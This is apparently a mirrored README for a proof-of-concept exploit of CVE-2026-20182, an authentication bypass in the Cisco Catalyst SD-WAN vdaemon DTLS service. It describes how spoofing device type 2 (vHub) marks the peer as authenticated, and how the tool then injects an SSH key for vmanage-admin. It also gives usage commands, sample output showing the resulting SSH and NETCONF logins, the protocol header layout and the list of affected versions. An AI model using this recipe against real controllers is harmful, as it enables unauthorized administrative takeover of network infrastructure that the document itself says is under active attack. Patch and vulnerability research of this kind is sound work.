Share
## https://sploitus.com/exploit?id=13DF22F3-E9C6-58EE-B458-EB585C4D715D
# CVE-2026-20182 โ Cisco Catalyst SD-WAN Controller / Manager Authentication Bypass
A proof-of-concept exploit for **CVE-2026-20182**, a critical (CVSS 10.0) authentication bypass in the vdaemon DTLS service (UDP/12346) on Cisco Catalyst SD-WAN Controller (vSmart) and Manager (vManage).
**Disclosed:** May 14, 2026 by Rapid7 (Stephen Fewer & Jonah Burgess)
**CISA KEV:** Added May 14, 2026 (Emergency Directive 26-03)
**CVSS:** 10.0 โ CWE-287: Improper Authentication
## Vulnerability
The vdaemon service uses a multi-phase DTLS handshake to authenticate control-plane peers. The `vbond_proc_challenge_ack()` function implements device-type-specific certificate verification โ but device type 2 (vHub) has **no verification code path**. Sending a CHALLENGE_ACK with `device_type=2` causes the function to fall through every conditional and unconditionally set `peer->authenticated = 1`.
No valid credentials, no CA-signed certificate, and no knowledge of the SD-WAN deployment are required.
## What the Exploit Does
1. Establishes a DTLS 1.2 connection to the target's vdaemon service (UDP/12346)
2. Receives the CHALLENGE message (msg_type=8)
3. Sends CHALLENGE_ACK claiming to be a **vHub** (device_type=2) โ peer is marked authenticated
4. Sends HELLO (msg_type=5) โ peer transitions to UP state
5. Injects an SSH public key into `/home/vmanage-admin/.ssh/authorized_keys` via `MSG_VMANAGE_TO_PEER` (msg_type=14)
6. Grants NETCONF access (SSH TCP/830) or SSH access (TCP/22) as `vmanage-admin`
## Usage
```bash
python3 cve-2026-20182.py -t [options]
```
### Options
| Argument | Description |
|----------|-------------|
| `-t`, `--target` | Target IP or hostname |
| `--port` | vdaemon UDP port (default: 12346) |
| `--key-file` | Path to an existing SSH public key to inject (optional) |
| `--netconf` | Verify exploitation by connecting to NETCONF via SSH |
### Examples
```bash
# Generate a fresh key pair and exploit
python3 cve-2026-20182.py -t 192.168.1.100
# Use an existing public key
python3 cve-2026-20182.py -t 192.168.1.100 --key-file ~/.ssh/id_rsa.pub
# Exploit and verify via NETCONF
python3 cve-2026-20182.py -t 192.168.1.100 --netconf
```
### Output
```
[*] Targeting 192.168.1.100:12346 (vdaemon DTLS)
[+] DTLS handshake complete (received msg_type=8, 1027 bytes)
[*] Sending CHALLENGE_ACK with device_type=2 (vHub) ...
[+] peer->authenticated = 1 (authentication bypassed!)
[*] Sending HELLO ...
[+] Peer is UP state (peering handshake bypass successful)
[*] Injecting SSH public key ...
[+] NETCONF: ssh -i /tmp/cve-2026-20182_key -o HostKeyAlgorithms=+ssh-rsa -p 830 vmanage-admin@192.168.1.100
[+] SSH: ssh -i /tmp/cve-2026-20182_key -o HostKeyAlgorithms=+ssh-rsa vmanage-admin@192.168.1.100
```
## Affected Versions
| Release | Fixed Version |
|---------|---------------|
| < 20.9 | Migrate to supported release |
| 20.9 | 20.9.9.1 |
| 20.10 | 20.12.7.1 |
| 20.11 | 20.12.7.1 |
| 20.12 | 20.12.5.4 / 20.12.6.2 / 20.12.7.1 |
| 20.13 | 20.15.5.2 |
| 20.14 | 20.15.5.2 |
| 20.15 | 20.15.4.4 / 20.15.5.2 |
| 20.16 | 20.18.2.2 |
| 20.18 | 20.18.2.2 |
| 26.1.1 | 26.1.1.1 |
## Research References
- **Rapid7 (Original Disclosure):** [CVE-2026-20182: Critical authentication bypass in Cisco Catalyst SD-WAN Controller](https://www.rapid7.com/blog/post/ve-cve-2026-20182-critical-authentication-bypass-cisco-catalyst-sd-wan-controller-fixed/) โ Full technical analysis, decompiled code, and protocol details by Stephen Fewer & Jonah Burgess
- **Cisco Security Advisory:** [cisco-sa-sdwan-rpa2-v69WY2SW](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-rpa2-v69WY2SW) โ Vendor advisory with fixed versions
- **CISA KEV:** [CVE-2026-20182](https://www.cisa.gov/known-exploited-vulnerabilities-catalog) โ Emergency Directive 26-03 (remediation by May 17, 2026)
- **NVD:** [CVE-2026-20182](https://nvd.nist.gov/vuln/detail/CVE-2026-20182) โ National Vulnerability Database entry
- **Rapid7 Metasploit Module:** `cisco_sdwan_vhub_auth_bypass` โ Auxiliary module in Metasploit framework
- **BleepingComputer:** [Cisco warns of new critical SD-WAN flaw exploited in zero-day attacks](https://www.bleepingcomputer.com/news/security/cisco-warns-of-new-critical-sd-wan-flaw-exploited-in-zero-day-attacks/)
- **Tenable:** [FAQ about the continued exploitation of Cisco SD-WAN vulnerabilities](https://www.tenable.com/blog/faq-about-the-continued-exploitation-of-cisco-catalyst-sd-wan-vulnerabilities-uat-8616)
- **Cisco Talos:** Threat actor UAT-8616 attributed to exploiting this vulnerability in the wild
## Technical Details
The vdaemon protocol header is 12 bytes:
| Offset | Size | Field | Notes |
|--------|------|-------|-------|
| 0 | 1 | msg_type | Low nibble = type, high nibble = version |
| 1 | 1 | device_info | High nibble = device_type, low nibble = flags |
| 2 | 1 | flags | Standard value 0xA0 |
| 3 | 1 | padding | Always 0x00 |
| 4-7 | 4 | domain_id | Big-endian uint32 |
| 8-11 | 4 | site_id | Big-endian uint32 |
Device types: 1=vEdge, 2=vHub, 3=vSmart, 4=vBond, 5=vManage
## Requirements
- Python 3.7+
- `openssl` CLI (for DTLS transport)
- `cryptography` library (`pip install cryptography`)
## Disclaimer
This exploit is intended solely for authorized red team operations, penetration testing, and security research on systems where you have explicit written permission. Unauthorized use is illegal.